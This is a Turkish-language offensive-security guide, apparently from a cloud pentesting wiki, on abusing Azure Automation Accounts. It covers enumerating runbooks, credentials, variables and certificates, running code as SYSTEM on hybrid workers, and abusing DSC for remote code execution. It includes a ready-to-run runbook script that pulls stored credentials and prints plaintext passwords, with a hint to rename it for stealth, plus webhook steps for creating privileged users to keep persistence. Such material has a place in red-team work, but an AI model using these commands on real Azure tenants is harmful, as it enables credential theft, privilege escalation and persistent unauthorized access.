Az - Automation Account

Temel Bilgiler

Belgelerden: Azure Automation, Azure ve Azure dışı ortamlarınızda tutarlı yönetimi destekleyen bulut tabanlı bir otomasyon, işletim sistemi güncellemeleri ve yapılandırma hizmeti sunar. Süreç otomasyonu, yapılandırma yönetimi, güncelleme yönetimi, paylaşılan yetenekler ve heterojen özellikler içerir.

Bunlar, Azure ortamını yönetmek, kontrol etmek ve yapılandırmak için şeyleri (hareketler veya hatta betikler) çalıştırmanıza izin veren Azure'daki "planlanmış görevler" gibidir.

Çalıştırma Hesabı

Çalıştırma Hesabı kullanıldığında, kendinden imzalı bir sertifika ile bir Azure AD uygulaması oluşturur, bir hizmet ilkesi oluşturur ve mevcut abonelikte hesap için Katkıda Bulunan rolünü atar (birçok ayrıcalık). Microsoft, Automation Account için Yönetilen Kimlik kullanılmasını önerir.

Çalışma Kitapları ve Görevler

Çalışma Kitapları, keyfi PowerShell kodunu çalıştırmanıza olanak tanır. Bu, ekli ilkenin (varsa) izinlerini çalmak için bir saldırgan tarafından kötüye kullanılabilir. Çalışma Kitapları kodunda hassas bilgiler (şifreler gibi) de bulabilirsiniz.

Eğer görevleri okuyabiliyorsanız, bunu yapın çünkü çalışmanın çıktısını içerir (potansiyel hassas bilgiler).

Otomasyon Hesapları --> <Otomasyon Hesabını Seçin> --> Çalışma Kitapları/Görevler/Hibrit işçi grupları/Gözlemci görevleri/kimlik bilgileri/değişkenler/sertifikalar/bağlantılar adresine gidin.

Hibrit İşçi

Bir Çalışma Kitabı, Azure içindeki bir konteynerde veya bir Hibrit İşçi (azure dışı makine) üzerinde çalıştırılabilir. Log Analytics Agent, onu hibrit işçi olarak kaydetmek için VM'ye dağıtılır. Hibrit işçi görevleri Windows'ta SYSTEM ve Linux'ta nxautomation hesabı olarak çalışır. Her Hibrit İşçi, bir Hibrit İşçi Grubu içinde kaydedilir.

Bu nedenle, bir Windows Hibrit İşçi üzerinde bir Çalışma Kitabı çalıştırmayı seçerseniz, Sistem olarak bir dış makine içinde keyfi komutlar çalıştıracaksınız (güzel bir pivot tekniği).

Kompromize Durum Yapılandırması (SC)

Belgelerden: Azure Automation Durum Yapılandırması, herhangi bir bulut veya yerel veri merkezindeki düğümler için PowerShell İstenen Durum Yapılandırması (DSC) yapılandırmalarını yazmanıza, yönetmenize ve derlemenize olanak tanıyan bir Azure yapılandırma yönetim hizmetidir. Hizmet ayrıca DSC Kaynaklarını içe aktarır ve yapılandırmaları hedef düğümlere atar, tüm bunlar bulutta gerçekleşir. Azure portalında Yapılandırma Yönetimi altında Durum yapılandırması (DSC) seçeneğini seçerek Azure Automation Durum Yapılandırmasına erişebilirsiniz.

Hassas bilgiler bu yapılandırmalarda bulunabilir.

RCE

Yönetilen makinelerde keyfi betikler çalıştırmak için SC'yi kötüye kullanmak mümkündür.

Sayım

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

Bir Runbook Oluştur

# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

Bir Run Book kullanarak bir Automation Account'ta tanımlanan Kimlik Bilgilerini ve Değişkenleri Sızdırma

# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness

# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt

Otomatik Yüksek Yetkili Kullanıcı Oluşturma İçin Adımlar

1. Bir Otomasyon Hesabı Başlatın

• Gerekli Eylem: Yeni bir Otomasyon Hesabı oluşturun.

• Özel Ayar: "Azure Run As hesabı oluştur" seçeneğinin etkin olduğundan emin olun.

2. Runbook'u İçe Aktarın ve Ayarlayın

• Kaynak: Örnek runbook'u MicroBurst GitHub Repository adresinden indirin.

• Gerekli Eylemler:

• Runbook'u Otomasyon Hesabına içe aktarın.

• Runbook'u çalıştırılabilir hale getirmek için yayınlayın.

• Dış tetikleyicileri etkinleştirmek için runbook'a bir webhook ekleyin.

3. AzureAD Modülünü Yapılandırın

• Gerekli Eylem: AzureAD modülünü Otomasyon Hesabına ekleyin.

• Ek Adım: Tüm Azure Otomasyon Modüllerinin en son sürümlerine güncellendiğinden emin olun.

4. İzin Ataması

• Atanacak Rolleri:

• Kullanıcı Yöneticisi

• Abonelik Sahibi

• Hedef: Bu rolleri gerekli ayrıcalıklar için Otomasyon Hesabına atayın.

5. Potansiyel Erişim Kaybı Farkındalığı

• Not: Bu tür bir otomasyonu yapılandırmanın abonelik üzerindeki kontrolü kaybetmenize yol açabileceğini unutmayın.

6. Kullanıcı Oluşturmayı Tetikleyin

• Yeni bir kullanıcı oluşturmak için webhook'u tetikleyin ve bir POST isteği gönderin.

• Sağlanan PowerShell betiğini kullanın, $uri'yi gerçek webhook URL'nizle değiştirdiğinizden ve $AccountInfo'yu istenen kullanıcı adı ve şifre ile güncellediğinizden emin olun.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body

Referanslar

• https://learn.microsoft.com/en-us/azure/automation/overview

• https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview

• https://github.com/rootsecdev/Azure-Red-Team#runbook-automation